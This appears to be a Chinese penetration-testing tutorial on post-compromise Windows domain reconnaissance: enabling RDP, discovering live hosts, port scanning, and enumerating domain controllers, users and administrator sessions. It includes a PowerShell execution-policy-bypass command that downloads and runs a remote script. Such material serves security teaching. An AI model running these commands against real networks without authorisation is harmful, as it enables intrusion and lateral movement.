<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wmic path win32_terminalservicesetting where (__CLASS !&#x3D;&quot;&quot;) call setallowtsconnections 1</span><br></pre></td></tr></table></figure>
<p>在Windows Server 2008和Windows Server 2012中开启3389端口：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">wmic &#x2F;namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !&#x3D;&quot;&quot;) call setallowtsconnections 1</span><br><span class="line"></span><br><span class="line">wmic &#x2F;namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName&#x3D;&#39;RDP-Tcp&#39;) call setuserauthenticationrequired 1</span><br><span class="line"></span><br><span class="line">reg add &quot;HKLM\SYSTEM\CURRENT\CONTROLSET\CONTROL\TERMINAL SERVER&quot; &#x2F;v fSingleSessionPerUser &#x2F;t REG_DWORD &#x2F;d 0 &#x2F;f</span><br></pre></td></tr></table></figure>

<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769453426416.jpg" alt="-w1021"><br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769453564264.jpg" alt="-w875"></p>
<h3 id="判断是否为域用户"><a href="#判断是否为域用户" class="headerlink" title="判断是否为域用户"></a>判断是否为域用户</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">whoami</span><br><span class="line">hostname 查看主机名</span><br><span class="line">比较是否相同</span><br><span class="line">ipconfig &#x2F;all</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769456706846.jpg" alt="-w259"></p>
<h3 id="查看该域内的主机（需本地管理员权限）"><a href="#查看该域内的主机（需本地管理员权限）" class="headerlink" title="查看该域内的主机（需本地管理员权限）"></a>查看该域内的主机（需本地管理员权限）</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net view &#x2F;domain:tlczwebsitecls</span><br><span class="line">                (域)</span><br></pre></td></tr></table></figure>
<h3 id="获取域SID"><a href="#获取域SID" class="headerlink" title="获取域SID"></a>获取域SID</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">whoami &#x2F;all</span><br></pre></td></tr></table></figure>
<h3 id="查询指定账户的详细信息"><a href="#查询指定账户的详细信息" class="headerlink" title="查询指定账户的详细信息"></a>查询指定账户的详细信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">net user XXX &#x2F;domain</span><br></pre></td></tr></table></figure>
<h2 id="域内信息收集"><a href="#域内信息收集" class="headerlink" title="域内信息收集"></a>域内信息收集</h2><h3 id="判断是否有域"><a href="#判断是否有域" class="headerlink" title="判断是否有域"></a>判断是否有域</h3><h4 id="ipconfig-all"><a href="#ipconfig-all" class="headerlink" title="ipconfig /all"></a>ipconfig /all</h4><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769824347886.jpg" alt="-w341"></p>
<p>如果有域之类信息：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771089145605.jpg" alt="-w454"><br>可以通过反向解析查询命令 nslookup 来解析域名的 IP 地址。使用解析出来的 IP 地址进行<br>对比，判断域控制器和 DNS 服务器是否在同一台服务器上:<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771088727116.jpg" alt="-w463"></p>
<h4 id="systeminfo"><a href="#systeminfo" class="headerlink" title="systeminfo"></a>systeminfo</h4><p>域即域名，登录服务器为域控制器。如果域显示为<br>WORKGROUP，表示当前服务器不在域内。当前域名为 hacke.testlab<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771091025090.jpg" alt="-w513"><br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771091434560.jpg" alt="-w513"></p>
<h4 id="net-config-workstation"><a href="#net-config-workstation" class="headerlink" title="net config workstation"></a>net config workstation</h4><p>工作站域 DNS 名称显示域名(如果显示为 WORKGROUP， 则表示非域环境)。登录域表明当前用户是域用户登录还是本地用户登录，此处表明当前用户是域 用户登录。<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771093672790.jpg" alt="-w505"><br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771093471966.jpg" alt="-w505"></p>
<h4 id="net-time-domain-判断主域"><a href="#net-time-domain-判断主域" class="headerlink" title="net time /domain (判断主域)"></a>net time /domain (判断主域)</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">输入net time &#x2F;domain 提示分以下三种</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769828097759.jpg" alt="-w281"><br>存在域，当前为域用户</p>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769825804661.jpg" alt="-w233"><br>提示拒绝访问，说明存在域，但是当前不是域用户。</p>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769826975222.jpg" alt="-w295"><br>提示上图，表示当前环境为工作组，不存在域</p>
<h3 id="域内存活主机探测"><a href="#域内存活主机探测" class="headerlink" title="域内存活主机探测"></a>域内存活主机探测</h3><h4 id="利用nbtscan探测内网"><a href="#利用nbtscan探测内网" class="headerlink" title="利用nbtscan探测内网"></a>利用nbtscan探测内网</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">nbtscan.exe 192.168.1.0&#x2F;24</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771097935264.jpg" alt="-w533"><br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771098055948.jpg" alt="-w874"></p>
<h4 id="利用icmp协议快速探测内网"><a href="#利用icmp协议快速探测内网" class="headerlink" title="利用icmp协议快速探测内网"></a>利用icmp协议快速探测内网</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">for &#x2F;L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr &quot;TTL&#x3D;&quot;</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15769852642734.jpg" alt="-w588"><br>也可以使用 VBS 脚本，代码如下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">strSubNet &#x3D; &quot;192.168.1.&quot;</span><br><span class="line">Set objFSO&#x3D; CreateObject(&quot;Scripting.FileSystemObject&quot;)</span><br><span class="line">Set objTS &#x3D; objfso.CreateTextFile(&quot;C:\Windows\Temp\Result.txt&quot;) For i &#x3D; 1 To 254</span><br><span class="line">strComputer &#x3D; strSubNet &amp; i</span><br><span class="line">blnResult &#x3D; Ping(strComputer)</span><br><span class="line">If blnResult &#x3D; True Then</span><br><span class="line">objTS.WriteLine strComputer &amp; &quot; is alived ! :) &quot; End If</span><br><span class="line">Next</span><br><span class="line">objTS.Close</span><br><span class="line">WScript.Echo &quot;All Ping Scan , All Done ! :) &quot;</span><br><span class="line">Function Ping(strComputer)</span><br><span class="line">Set objWMIService &#x3D; GetObject(&quot;winmgmts:\\.\root\cimv2&quot;)</span><br><span class="line">Set colItems &#x3D; objWMIService.ExecQuery(&quot;Select * From Win32_PingStatus Where Address&#x3D;&#39;&quot; &amp; strComputer &amp; &quot;&#39;&quot;)</span><br><span class="line">For Each objItem In colItems</span><br><span class="line">Select case objItem.StatusCode</span><br><span class="line">Case 0</span><br><span class="line">Ping &#x3D; True</span><br><span class="line">Case Else</span><br><span class="line">Ping &#x3D; False</span><br><span class="line">End select</span><br><span class="line">Exit For</span><br><span class="line">Next</span><br><span class="line">End Function</span><br></pre></td></tr></table></figure>
<p>使用方法：<br>在使用时，需要修改 IP 地址段。输入如下命令，添加参数/b 表示置于后台运行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cscript c:\windows\temp\1.vbs</span><br></pre></td></tr></table></figure>
<p>默认会把扫描结果写到 C:\Windows\Temp\Result.txt 文件中。</p>
<h4 id="通过-ARP-扫描探测内网"><a href="#通过-ARP-扫描探测内网" class="headerlink" title="通过 ARP 扫描探测内网"></a>通过 ARP 扫描探测内网</h4><h5 id="arp-scan工具"><a href="#arp-scan工具" class="headerlink" title="arp-scan工具"></a>arp-scan工具</h5><p>直接把 arp.exe 上传到目标机器上运行，可以自定义掩码、指定扫描范围等，命令如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Arp.exe –t 192.168.1.0&#x2F;20</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771100184943.jpg" alt="-w548"></p>
<h5 id="Empire中的arpsan模块"><a href="#Empire中的arpsan模块" class="headerlink" title="Empire中的arpsan模块"></a>Empire中的arpsan模块</h5><p>输入“usemodule situational_awareness/network/arpscan”命令，即可使用 arpsan 模块:<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771100667318.jpg" alt="-w706"></p>
<h5 id="Nishang中的Invoke-ARPScan-ps1脚本"><a href="#Nishang中的Invoke-ARPScan-ps1脚本" class="headerlink" title="Nishang中的Invoke-ARPScan.ps1脚本"></a>Nishang中的Invoke-ARPScan.ps1脚本</h5><p>使用 Nishang 中的 Invoke-ARPScan.ps1 脚本，可以将脚本上传到目标主机执行，也可以直接 远程加载执行、自定义掩码和扫描范围，命令如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">需要下载上传该脚本</span><br><span class="line">powershell.exe -exec bypass -Command &quot;&amp; &#123;Import-Module C:\windows\temp\Invoke- ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.1.0&#x2F;24&#125;&quot; &gt;&gt; C:\windows\temp\log.txt</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771104567172.jpg" alt="-w503"></p>
<h4 id="通过常规-TCP-UDP-端口扫描探测内网"><a href="#通过常规-TCP-UDP-端口扫描探测内网" class="headerlink" title="通过常规 TCP/UDP 端口扫描探测内网"></a>通过常规 TCP/UDP 端口扫描探测内网</h4><p>ScanLine 是一款经典的端口扫描工具，Windows 全版本通用，体积小，仅使用单个文件，同 时支持对 TCP/UDP 的端口扫描，命令如下:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">需下载后使用</span><br><span class="line">scanline -h -t 22,80- 89,110,389,445,3389,1099,1433,2049,6379,7001,8080,1521,3306,3389,5432 -u 53,161,137,139 -O c:\windows\temp\log.txt -p 192.168.1.1-254 &#x2F;b</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771126669354.jpg" alt="-w697"></p>
<h4 id="扫描域内端口"><a href="#扫描域内端口" class="headerlink" title="扫描域内端口"></a>扫描域内端口</h4><h5 id="利用-Telnet-命令进行扫描"><a href="#利用-Telnet-命令进行扫描" class="headerlink" title="利用 Telnet 命令进行扫描"></a>利用 Telnet 命令进行扫描</h5><p>如果只是想快速地探测某主机的某个常规高危端口是否开放，Telnet 命令是 最方便的：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771127951827.jpg" alt="-w506"></p>
<h5 id="S扫描器"><a href="#S扫描器" class="headerlink" title="S扫描器"></a>S扫描器</h5><p>TCP扫描命令：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">S.exe TCP 192.168.1.1 192.168.1.254 445,3389,1433,7001,1099,8080,80,22,23,21,25,110,3306,5432,1521,6379,2049,111 256 &#x2F;Banner &#x2F;save</span><br></pre></td></tr></table></figure>
<h5 id="Metasploit端口扫描"><a href="#Metasploit端口扫描" class="headerlink" title="Metasploit端口扫描"></a>Metasploit端口扫描</h5><p>在 msfconsole 下运行“search portscan”命令<br>使用 auxiliary/scanner/portscan/tcp 模块<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771128866487.jpg" alt="-w733"></p>
<h5 id="PowerSploit下的Invoke-portscan-ps1模块-无需下载"><a href="#PowerSploit下的Invoke-portscan-ps1模块-无需下载" class="headerlink" title="PowerSploit下的Invoke-portscan.ps1模块(无需下载)"></a>PowerSploit下的Invoke-portscan.ps1模块(无需下载)</h5><p>PowerSploit 中的 Invoke-Portscan.ps1 脚本，推荐使用无文件形式的扫描:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell.exe -nop -exec bypass -c &quot;IEX (New-Object Net.WebClient).DownloadString(&#39;https:&#x2F;&#x2F;raw.githubusercontent.com&#x2F;PowerShellMafia&#x2F;PowerSploit&#x2F;master&#x2F;Recon&#x2F;Invoke-Portscan.ps1&#39;);Invoke-Portscan -Hosts 192.168.1.0&#x2F;24 -T 4 -ports &#39;445,1433,8080,3389,80&#39; -oA c:\windows\temp\res.txt&quot;</span><br></pre></td></tr></table></figure>
<p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771131252938.jpg" alt="-w735"></p>
<h5 id="Nishang-下的-Invoke-PortScan-模块"><a href="#Nishang-下的-Invoke-PortScan-模块" class="headerlink" title="Nishang 下的 Invoke-PortScan 模块"></a>Nishang 下的 Invoke-PortScan 模块</h5><p>具体的参数介绍如下。</p>
<ol>
<li>StartAddress:扫描范围开始的地址。</li>
<li>EndAddress:扫描范围结束的地址。</li>
<li>ScanPort:进行端口扫描。</li>
<li>Port:指定扫描端口。默认扫描的端口有 21、22、23、53、69、71、80、98、110、139、<br>111、389、443、445、1080、1433、2001、2049、3001、3128、5222、6667、6868、7777、<br>7878、8080、1521、3306、3389、5801、5900、5555、5901。</li>
<li>TimeOut:设置超时时间。<br>使用以下命令对本地局域网进行扫描，搜索存活主机并解析主机名，如图所示:<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">需要下载</span><br><span class="line">Invoke-PortScan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 - ResolveHost</span><br></pre></td></tr></table></figure>

</li>
</ol>
<h5 id="端口Banner信息"><a href="#端口Banner信息" class="headerlink" title="端口Banner信息"></a>端口Banner信息</h5><p>在发现端口后，可以使用客户端连接工具或者 nc 连接，获取服务端的 Banner 信息。获取 Banner 信息后，在漏洞库中查找对应 CVE 编号的 POC、EXP，在 ExploitDB、Seebug 等平台上查 看相关的漏洞利用的工具，然后去验证漏洞是否存在。<br>相关漏洞的具体信息分析和共享，可以参考如下两个网站。</p>
<ol>
<li>安全焦点:其 BugTraq 是一个出色的漏洞和 Exploit 数据源，可以通过 CVE 编号或者产品<br>信息漏洞直接搜索，网址为 <a href="http://www.securityfocus.com/bid。" target="_blank" rel="noopener">http://www.securityfocus.com/bid。</a></li>
<li>Exploit-DB:取代了老牌安全网站 milw0rm，不断更新大量的 Exploit 程序和报告，搜索范围是整个网站的内容，网址为 <a href="http://www.exploit-db.com。" target="_blank" rel="noopener">http://www.exploit-db.com。</a></li>
</ol>
<h4 id="常见的端口及其说明（端口爆破及利用）"><a href="#常见的端口及其说明（端口爆破及利用）" class="headerlink" title="常见的端口及其说明（端口爆破及利用）"></a>常见的端口及其说明（端口爆破及利用）</h4><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771148964139.jpg" alt="-w627"><br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771149082467.jpg" alt="-w658"></p>
<h3 id="收集域内基础信息"><a href="#收集域内基础信息" class="headerlink" title="收集域内基础信息"></a>收集域内基础信息</h3><p>域用户和system权限本地用户可以运行以下命令</p>
<h4 id="查询域-net-view-domain"><a href="#查询域-net-view-domain" class="headerlink" title="查询域 net view /domain"></a>查询域 net view /domain</h4><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771976497576.jpg" alt="-w330"></p>
<h4 id="查询此域内所有计算机-net-view-domain-XXX"><a href="#查询此域内所有计算机-net-view-domain-XXX" class="headerlink" title="查询此域内所有计算机 net view /domain:XXX"></a>查询此域内所有计算机 net view /domain:XXX</h4><pre><code>“dev”可能是开发服务器，
“web”或者 app 可能是 Web 服务，
“NAS”可能是存储服务器， 
“fileserver”可能是文件服务器等</code></pre><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771977956697.jpg" alt="-w381"></p>
<h4 id="查询域内所有用户组列表-net-group-domain"><a href="#查询域内所有用户组列表-net-group-domain" class="headerlink" title="查询域内所有用户组列表 net group /domain"></a>查询域内所有用户组列表 net group /domain</h4><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771978415865.jpg" alt="-w395"><br>可以看到，该域含有 13 个组。系统自带的常见组如下:</p>
<pre><code>Domain Admins:域管理员组。
Domain Computers:域内机器。
Domain Controllers:域控制器。
Domain Guest:域访客组，权限较低。 
Domain Users:域用户。
Enterprise Admins:企业系统管理员用户。</code></pre><p>在默认情况下，Domain Admins 和 Enterprise Admins 对域内所有域控制器有完全控制权限。</p>
<h4 id="查询所有域成员计算机列表-net-group-“domain-computers”-domain"><a href="#查询所有域成员计算机列表-net-group-“domain-computers”-domain" class="headerlink" title="查询所有域成员计算机列表 net group “domain computers” /domain"></a>查询所有域成员计算机列表 net group “domain computers” /domain</h4><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771984205664.jpg" alt="-w488"></p>
<h4 id="获取域密码信息-net-accounts-domain"><a href="#获取域密码信息-net-accounts-domain" class="headerlink" title="获取域密码信息 net accounts /domain"></a>获取域密码信息 net accounts /domain</h4><p>执行如下命令，获得域密码策略设置、密码长短、错误锁定等信息：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771984689634.jpg" alt="-w442"></p>
<h4 id="获取域信任信息-nltest-domain-trusts"><a href="#获取域信任信息-nltest-domain-trusts" class="headerlink" title="获取域信任信息 nltest /domain_trusts"></a>获取域信任信息 nltest /domain_trusts</h4><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771985266692.jpg" alt="-w727"></p>
<h3 id="查找域控制器"><a href="#查找域控制器" class="headerlink" title="查找域控制器"></a>查找域控制器</h3><h4 id="查看域内控制器的机器名-nltest-DCLIST-XXX"><a href="#查看域内控制器的机器名-nltest-DCLIST-XXX" class="headerlink" title="查看域内控制器的机器名 nltest /DCLIST:XXX"></a>查看域内控制器的机器名 nltest /DCLIST:XXX</h4><p>执行如下命令，可以看到域控制器机器名为 DC：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771986386657.jpg" alt="-w562"></p>
<h4 id="查看域内控制器的主机名-Nslookup-type-SRV-ldap-tcp"><a href="#查看域内控制器的主机名-Nslookup-type-SRV-ldap-tcp" class="headerlink" title="查看域内控制器的主机名 Nslookup -type=SRV _ldap._tcp"></a>查看域内控制器的主机名 Nslookup -type=SRV _ldap._tcp</h4><p>执行如下命令，可以看到域控制器主机名为 dc：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771986890506.jpg" alt="-w504"></p>
<h4 id="查看当前时间-net-time-domain"><a href="#查看当前时间-net-time-domain" class="headerlink" title="查看当前时间 net time /domain"></a>查看当前时间 net time /domain</h4><p>一般时间服务器为主域控制器：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771988967613.jpg" alt="-w484"></p>
<h4 id="查看域控制器组-net-group-“Domain-Controllers”-domain"><a href="#查看域控制器组-net-group-“Domain-Controllers”-domain" class="headerlink" title="查看域控制器组 net group “Domain Controllers” /domain"></a>查看域控制器组 net group “Domain Controllers” /domain</h4><p>执行如下命令，查看域控制器组。有一台域控制器的机器名为 DC：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771989422965.jpg" alt="-w475"><br>在真实环境中，一般存在两台或两台以上的域控制器，其目的是:一旦主域控制器发生故障， 备用的域控制器可以使域内服务验证正常进行。<br>执行如下命令，可以看到域控制器的机器名为 DC：</p>
<pre><code>netdom query pdc</code></pre><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771989888535.jpg" alt="-w319"></p>
<h3 id="获取域内的用户和管理员信息"><a href="#获取域内的用户和管理员信息" class="headerlink" title="获取域内的用户和管理员信息"></a>获取域内的用户和管理员信息</h3><h4 id="查询所有域用户列表"><a href="#查询所有域用户列表" class="headerlink" title="查询所有域用户列表"></a>查询所有域用户列表</h4><h5 id="向域控制器进行查询-net-user-domain"><a href="#向域控制器进行查询-net-user-domain" class="headerlink" title="向域控制器进行查询 net user /domain"></a>向域控制器进行查询 net user /domain</h5><p>执行如下命令，向域控制器 DC 进行查询。如图所示。域内存在四个用户，krbtgt 是用来创建票据授予服务(TGS)加密的密钥，它可以实现多种对域内持久化权限对方法。<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771991831002.jpg" alt="-w542"></p>
<h5 id="获取域内用户详细信息-wmic-useraccount-get-all"><a href="#获取域内用户详细信息-wmic-useraccount-get-all" class="headerlink" title="获取域内用户详细信息 wmic useraccount get /all"></a>获取域内用户详细信息 wmic useraccount get /all</h5><p>执行如下命令，可以获取域内用户详细信息，常见参数包括用户名、描述信息、SID、域名、状态：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771992593818.jpg" alt="-w927"></p>
<h5 id="查看存在的用户-dsquery-user"><a href="#查看存在的用户-dsquery-user" class="headerlink" title="查看存在的用户 dsquery user"></a>查看存在的用户 dsquery user</h5><p>执行如下命令，可以看到存在四个用户：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771993012389.jpg" alt="-w454"><br>常用的 dsquery 命令，如图:<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771993617480.jpg" alt="-w397"></p>
<h5 id="查询域内置本地管理员组用户-net-localgroup-administrators-domain"><a href="#查询域内置本地管理员组用户-net-localgroup-administrators-domain" class="headerlink" title="查询域内置本地管理员组用户 net localgroup administrators /domain"></a>查询域内置本地管理员组用户 net localgroup administrators /domain</h5><p>执行如下命令，可以看到，本地管理员有两个用户和一个组：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771994249358.jpg" alt="-w683"><br>默认 Domain Admins 组为域内机器的本地管理员用户。在真实环境中，为了方便管理，会有域用户被添加为域机器的本地管理员用户。</p>
<h4 id="查询域管理员用户组"><a href="#查询域管理员用户组" class="headerlink" title="查询域管理员用户组"></a>查询域管理员用户组</h4><h5 id="查询域管理员用户-net-group-“domain-admins”-domain"><a href="#查询域管理员用户-net-group-“domain-admins”-domain" class="headerlink" title="查询域管理员用户 net group “domain admins” /domain"></a>查询域管理员用户 net group “domain admins” /domain</h5><p>执行如下命令，可以看到存在两个域管理员用户：<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15771996116149.jpg" alt="-w650"></p>
<h5 id="查询管理员用户组-net-group-“Enterprise-Admins”-domain"><a href="#查询管理员用户组-net-group-“Enterprise-Admins”-domain" class="headerlink" title="查询管理员用户组 net group “Enterprise Admins” /domain"></a>查询管理员用户组 net group “Enterprise Admins” /domain</h5><p>执行如下命令，看到管理员用户为 Administrator<br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772015590179.jpg" alt="-w682"></p>
<h3 id="定位域管理员"><a href="#定位域管理员" class="headerlink" title="定位域管理员"></a>定位域管理员</h3><p>定位域内管理员的常规渠道，一是日志，二是会话。<br>1、日志是指本地机器的管理 员日志，可以使用脚本或 wevtutil 导出查看。<br>2、会话是指域内每个机器的登录会话，可以匿名查询， 无须权限，可以使用 netsess.exe 或 PowerView 等工具查询。</p>
<h4 id="常用域管理员定位工具"><a href="#常用域管理员定位工具" class="headerlink" title="常用域管理员定位工具"></a>常用域管理员定位工具</h4><h5 id="psloggedon-exe-显示本地登录的用户和通过本地计算机或远程计算机的资源登录的用户"><a href="#psloggedon-exe-显示本地登录的用户和通过本地计算机或远程计算机的资源登录的用户" class="headerlink" title="psloggedon.exe 显示本地登录的用户和通过本地计算机或远程计算机的资源登录的用户"></a>psloggedon.exe 显示本地登录的用户和通过本地计算机或远程计算机的资源登录的用户</h5><p><a href="https://docs.microsoft" target="_blank" rel="noopener">https://docs.microsoft</a>. com/en-us/sysinternals/downloads/psloggedon<br>使用如下命令及参数:</p>
<pre><code>psloggedon [-] [-l] [-x] [\\computername|username]</code></pre><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772390174429.jpg" alt="-w392"></p>
<pre><code>-:显示支持的选项和用于输出值的单位。
-l:仅显示本地登录，不显示本地和网络资源登录。
-x:不显示登录时间。
\\computername:指定要列出登录信息的计算机的名称。
Username:指定用户名，在网络中搜索该用户登录的计算机。</code></pre><h5 id="pveFindADUser-exe-curren-即可显示域中的所有计算机-计算机、服务器、域控制器等-上当前登录的所有用户"><a href="#pveFindADUser-exe-curren-即可显示域中的所有计算机-计算机、服务器、域控制器等-上当前登录的所有用户" class="headerlink" title="pveFindADUser.exe  -curren 即可显示域中的所有计算机 (计算机、服务器、域控制器等)上当前登录的所有用户"></a>pveFindADUser.exe  -curren 即可显示域中的所有计算机 (计算机、服务器、域控制器等)上当前登录的所有用户</h5><p>包括本地用户、通过 RDP 登录的用户、用于运行服务和计划任务的用户账 户。运行该工具的计算机需要具有.NET Framework 2.0，并且需要具有管理员权限。<br>下载地址为 <a href="https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn" target="_blank" rel="noopener">https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn</a></p>
<pre><code>pveFindADUser.exe &lt;参数&gt;

-current [&apos;&apos;username&apos;&apos;]:如果仅指定了-current 参数，将获取所有目标计算机上当前登录的所有用户。如果指定了用户名(DOMAIN\Username)，则显示该用户登录的计算机。
-last [&apos;&apos;username&apos;&apos;]:如果仅指定了-last 参数，将获取目标计算机上的最后一个登录用户。如果指定了用户名(DOMAIN\Username)，则显示具有此用户账户作为上次登录的计算机。</code></pre><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772402050542.jpg" alt="-w646"></p>
<h5 id="netview-exe-lt-参数-gt-枚举登录的用户"><a href="#netview-exe-lt-参数-gt-枚举登录的用户" class="headerlink" title="netview.exe &lt;参数&gt;  枚举登录的用户"></a>netview.exe &lt;参数&gt;  枚举登录的用户</h5><p>下载地址为 <a href="https://github.com/mubix/netview" target="_blank" rel="noopener">https://github.com/mubix/netview</a></p>
<pre><code>-h:显示帮助菜单。
-f filename.txt:指定从中提取主机列表的文件。
-e filename.txt:指定要排除的主机名文件。
-o filename.txt:将所有输出重定向到文件。
-d domain:指定从中提取主机列表的域。如果没有指定，则使用当前域。
-g group:指定用户搜寻的组名。如果没有指定，则使用 Domain Admins。 
-c:检查对已找到共享的访问权限。</code></pre><p><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772422796930.jpg" alt="-w453"></p>
<h5 id="Nmap-的-NSE-脚本"><a href="#Nmap-的-NSE-脚本" class="headerlink" title="Nmap 的 NSE 脚本"></a>Nmap 的 NSE 脚本</h5><p>如果有域账户或者本地账户，就可以使用 Nmap 的 smb-enum-sessions.nse 引擎来获取远程机 器的登录会话，并且不需要管理员权限，如图所示。smb-enum-sessions.nse 的下载地址为 <a href="https://nmap.org/nsedoc/scripts/smb-enum-sessions.html。" target="_blank" rel="noopener">https://nmap.org/nsedoc/scripts/smb-enum-sessions.html。</a><br><img src="https://tale-1259367723.cos.ap-beijing.myqcloud.com/2020/02/23/15772426918788.jpg" alt="-w349"></p>
<pre><code> smb-enum-domains.nse:对域控制器进行信息收集，可以获取主机信息、用户、密码策略可 以使用的用户等。
 smb-enum-users.nse:在进行域渗透测试的时候，如果获取了域内某台主机的权限，但是权 限有限，不能获取更多的域用户信息，就可以借助这个脚本对域控制器进行扫描。
 smb-enum-shares.nse:遍历远程主机的共享目录。
